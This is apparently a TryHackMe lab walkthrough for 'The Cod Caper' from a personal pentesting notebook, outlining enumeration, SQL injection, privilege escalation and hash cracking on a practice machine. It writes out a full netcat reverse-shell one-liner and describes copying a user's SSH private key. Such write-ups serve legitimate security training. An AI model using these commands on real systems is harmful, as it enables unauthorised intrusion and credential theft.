📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Host Enumeration
  • Web Enumeration
  • Web Exploitation
  • Command Execution
  • LinEnum
  • pwndbg
  • Binary-Exploitation: Manually
  • Binary-Exploitation: The Pwntools way
  • Binary Exploitation
  • Finishing The Job

Was this helpful?

  1. TryHackMe
  2. Walkthroughs: Easy

The Cod Caper

PreviousBlasterNextHardening Basics Part 1

Last updated 3 years ago

Was this helpful?

Host Enumeration

Lets run nmap scan to find open ports and the services running on them

Web Enumeration

Lets check the webpage.

Its a default Apache2 page, lets run gobuster to find hidden files and directories

Web Exploitation

Lets use Sqlmap to find more information.

Command Execution

Lets check the administrator.php page and login with the credentials we found.

Looks like we can run commands. Lets get a reverse shell on the machine, first we start a netcat listener.

Now lets run the reverse shell command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 1234 >/tmp/f

We have a shell. Lets stabilize the shell.

Lets look at how many files are in the current directory.

Lets check if pingu still has his account on this machine.

Looks like he does.

Lets look for interesting files belonging to www-data.

Lets look at this interesting file

Looks like a password.

Lets now go get the private ssh key of pingu.

Lets cat the contents of id_rsaand copy it to our machine and call the file id_rsa.

Now lets set the permissions for the file and login with the password we found.

LinEnum

Lets use the second method, first on our machine lets cd into the directory where the LinEnum file is located and then start a http server on port 8000

Now lets go to the /tmp folder on the victim machine and download the file.

Now lets give it executable permissions and run the file.

Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common.

pwndbg

Binary-Exploitation: Manually

Binary-Exploitation: The Pwntools way

Binary Exploitation

Lets use the manual way

Lets cd into the /opt/secret directory and run the command to get the hash of the root user

Finishing The Job

We have the hash, lets copy it and save it on our machine in a file called hash and lets crack it using hashcat.

We have the password.